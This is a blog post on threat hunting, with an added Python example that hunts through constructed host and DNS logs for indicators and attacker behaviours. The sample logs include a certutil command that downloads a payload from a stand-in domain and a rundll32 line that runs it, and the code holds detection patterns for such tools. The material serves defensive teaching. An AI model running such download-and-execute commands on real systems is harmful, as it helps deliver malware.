Threat Hunting in 2023 — What Matters Most to You and Your Teams?
Bit of Background on Threat Hunting
Today I would like to discuss threat hunting. To begin with, I would like to acknowledge that threat hunting is as old as modern computing and internetworking. One of the earliest and best known examples is Cliff Stoll’s pursuit of an intruder through the computers and network connections of Lawrence Berkeley National Laboratory (LBNL) back in 1986. For more on Cliff, his adventures in threat hunting, adversary attribution, and international intrigue and espionage, I would encourage you to read his book The Cuckoo’s Egg: Tracking a Spy Through the Maze of Computer Espionage[i]. And I am sure that if we looked further back, we would find other examples of comparable exploitation and compromise that were ferreted out (and perhaps classified) as matters of national security.
So, to begin with, I think it would be appropriate to provide a quick definition of threat hunting for those who may not be familiar with it as a discipline related to many other disciplines in the cybersecurity industry. Very simply, threat hunting is the practice of proactively “hunting” (querying, searching, looking) for threats and adversarial threat actors that may be attempting to compromise your organization’s assets, or that have already done so. Assets here include people, systems, data and intellectual property, finances, and networks (on premises, cloud, hybrid, remote worker, etc.). A successful compromise, whether a single attack, an operation, or a campaign, typically leaves the adversary with an established set of footholds (ingress and egress points) that allow unfettered access to your organization and environment, and those footholds and the activity around them are what the hunter is looking for. Put another way, threat hunting is the active exercise of looking for the artifacts and behaviours associated with known and unknown threats and actors that may be, or definitively are, targeting your organization and its assets. It is adjacent to, and very much a part of, the threat research and intelligence discipline (threat researchers and intelligence analysts cannot be good at what they do without ongoing development and mastery of hunting). However, as an applied discipline and functional responsibility it is often found outside cyber threat intelligence (CTI) teams, featuring prominently in mature SOCs and incident response organizations.
Several organizations and individuals through the years have written much about the subject of threat hunting and offer interesting, and at times unique, interpretations and opinions on what threat hunting is and what ought to be considered and put into practice. Organizations including the MITRE Corporation[ii], Microsoft[iii], Sqrrl (now part of Amazon)[iv][v], CrowdStrike[vi], ThreatConnect[vii][viii], and SOCPrime[ix] (to name a few) have written extensively on this topic, as have many author teams on related models (e.g., the Diamond Model[x], the Pyramid of Pain[xi], and many more) that are useful in threat hunting and in research of all types into advanced threats and the adversaries responsible for them.
What Matters Most to You and Your Team?
This is where threat hunting becomes personal, to one extent or another. You, your colleagues, and your leadership need to establish what matters most to you in order to conduct the best and most comprehensive hunting in your environment, against all your assets. Naturally, having access to tooling and feature sets that let the defender live off the land (that is, hunt with the platforms and telemetry the organization already operates) is critical. Additionally, well instrumented network segments yielding full packet capture and metadata derived from north-south and east-west (NSEW) visibility, along with logs collected from hosts of all types (mobile devices, which are hard but not impossible; endpoints such as laptops, desktops and servers; and internetworking kit, including virtual appliances and cloud-based capabilities), will be crucial. All of this, in concert with well curated, high-quality threat intelligence and detection logic, plus the backend systems that support them, will no doubt play a key role in your organization’s approach to threat hunting and everything related to it (e.g., incident response, forensics, etc.). Furthermore, in planning your approach toward long-term threat hunting success you will need to take into consideration your organization’s maturity, as well as the skillset and experience your team has at its disposal.
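As an added illustration of the hunt the two sections above describe (this is example code, not code from the post or from any of the organizations cited), the Python below runs a hypothesis-driven hunt over a handful of constructed host process-creation and DNS log lines, the two telemetry sources called out above. It sweeps once for atomic indicators from a constructed intel feed, the bottom of the Pyramid of Pain, and once for behavioural hypotheses that sit near the top of the pyramid, then groups the findings by host for triage. The key=value line format, the hostnames, the cdn-upd.example domain, the indicator feed and the three hypotheses are all assumptions made for the example.

```python
"""Hypothesis-driven hunt over host process and DNS telemetry.

Added illustration, not code from the post. The line format, hostnames,
domain, indicator feed and hunt hypotheses below are all constructed for
the example.
"""
import re
from collections import defaultdict

# Constructed telemetry: one event per line as key=value pairs, mixing the two
# sources the post calls out, host process-creation logs and DNS metadata.
SAMPLE_LOGS = """\
ts=2023-03-01T09:01:10Z type=proc host=ws-17 user=alice parent=explorer.exe image=outlook.exe cmd="outlook.exe"
ts=2023-03-01T09:02:44Z type=proc host=ws-17 user=alice parent=winword.exe image=cmd.exe cmd="cmd.exe /c certutil -urlcache -split -f http://cdn-upd.example/upd.bin %TEMP%\\upd.bin"
ts=2023-03-01T09:02:45Z type=dns host=ws-17 qname=cdn-upd.example rcode=0
ts=2023-03-01T09:05:00Z type=proc host=ws-17 user=alice parent=cmd.exe image=rundll32.exe cmd="rundll32.exe C:\\Users\\alice\\AppData\\Local\\Temp\\upd.bin,Start"
ts=2023-03-01T09:10:12Z type=dns host=srv-db-02 qname=login.microsoftonline.com rcode=0
ts=2023-03-01T09:11:30Z type=proc host=srv-db-02 user=svc_sql parent=services.exe image=sqlservr.exe cmd="sqlservr.exe"
ts=2023-03-01T09:12:01Z type=dns host=ws-22 qname=cdn-upd.example rcode=0
"""

# Constructed intel feed: atomic indicators, the bottom of the Pyramid of Pain.
INDICATORS = {"domain": {"cdn-upd.example"}}

# Behavioural hypotheses: tools and TTPs, the top of the pyramid. Each is a
# predicate over one parsed event plus the label the hunter would report.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "mshta.exe"}

def office_spawns_shell(e):
    return e.get("type") == "proc" and e.get("parent") in OFFICE_APPS and e.get("image") in SHELLS

def certutil_download(e):
    cmd = e.get("cmd", "").lower()
    return e.get("type") == "proc" and "certutil" in cmd and "-urlcache" in cmd

def rundll32_from_user_temp(e):
    cmd = e.get("cmd", "").lower()
    return e.get("type") == "proc" and e.get("image") == "rundll32.exe" and "\\appdata\\local\\temp\\" in cmd

HYPOTHESES = [
    ("Office application spawned a command shell", office_spawns_shell),
    ("certutil -urlcache used to fetch a remote file", certutil_download),
    ("rundll32 loaded a module from the user's Temp directory", rundll32_from_user_temp),
]

_KV = re.compile(r'(\w+)=("([^"]*)"|\S+)')

def parse_event(line):
    """Parse one key=value line; quoted values may contain spaces."""
    return {k: (q if v.startswith('"') else v) for k, v, q in _KV.findall(line)}

def hunt_indicators(events, indicators):
    """Atomic-indicator sweep: cheap, but evaded as soon as the adversary rotates infrastructure."""
    return [(e["host"], "known-bad domain resolved: " + e["qname"])
            for e in events
            if e.get("type") == "dns" and e.get("qname") in indicators["domain"]]

def hunt_behaviours(events, hypotheses=HYPOTHESES):
    """Behavioural sweep: each hypothesis describes how the adversary operates, not what they used last week."""
    return [(e["host"], label) for e in events for label, pred in hypotheses if pred(e)]

def run_hunt(raw_logs, indicators=INDICATORS):
    """Run both sweeps and group findings by host so a hunter can pivot from any hit."""
    events = [parse_event(l) for l in raw_logs.splitlines() if l.strip()]
    findings = defaultdict(list)
    for host, what in hunt_indicators(events, indicators) + hunt_behaviours(events):
        findings[host].append(what)
    return dict(findings)

def triage_order(findings):
    """Hosts with the most distinct findings first: a lone DNS hit may be a prefetch or a sandbox, several behaviours on one host rarely are."""
    return sorted(findings, key=lambda h: (-len(set(findings[h])), h))

if __name__ == "__main__":
    results = run_hunt(SAMPLE_LOGS)
    for host in triage_order(results):
        print(host)
        for what in results[host]:
            print("  -", what)
```

Run it as a script to see the triage order. The point of running two sweeps is the one the Pyramid of Pain makes: the indicator match on ws-22 stops working the moment the adversary rotates domains, while the three behavioural hits on ws-17 survive that rotation, so a hunt program that wants to stay ahead of the adversary should spend most of its effort on the second kind.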
Closing Thoughts
In the end, though there are many different interpretations of threat hunting and the best ways to go about conducting it, there really is no one size fits all. Every organization is unique and has its own strengths and weaknesses, despite the commonalities among organizations that belong to the same industry vertical. Threat hunting is best approached from an informed perspective, with the understanding that execution will more likely than not require a tailored approach in which the organization’s tooling, monitoring and collection capabilities, program maturity (process and procedure), and personnel skillset must all be considered and accounted for. And, lastly, despite all that should or must be considered, there is no better time to begin, if you have not already, than the present. Proactive approaches to threat hunting are the most successful, and many involve more than a little trial and error. Do not be put off by the experimentation involved in honing skill and expertise in threat hunting. Remember: Rome was not built in a day, and neither was any threat hunting program worth its salt. Happy hunting!
[i] https://www.amazon.com/Cuckoos-Egg-Tracking-Computer-Espionage/dp/1416507787
[ii] https://www.mitre.org/sites/default/files/2021-11/prs-19-3892-ttp-based-hunting.pdf
[iii] https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE5aC6y?culture=en-us&country=US
[iv] https://www.threathunting.net/files/hunt-evil-practical-guide-threat-hunting.pdf
[v] https://www.threathunting.net/files/huntpedia.pdf
[vi] https://www.crowdstrike.com/cybersecurity-101/threat-hunting/
[vii] https://threatconnect.com/blog/soar-reactive-threat-hunting-part-1/
[viii] https://threatconnect.com/blog/tactical-threat-hunting-what-is-it-and-how-do-you-start/
[ix] https://socprime.com/blog/what-is-cyber-threat-hunting/
[x] https://apps.dtic.mil/sti/pdfs/ADA586960.pdf
[xi] https://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html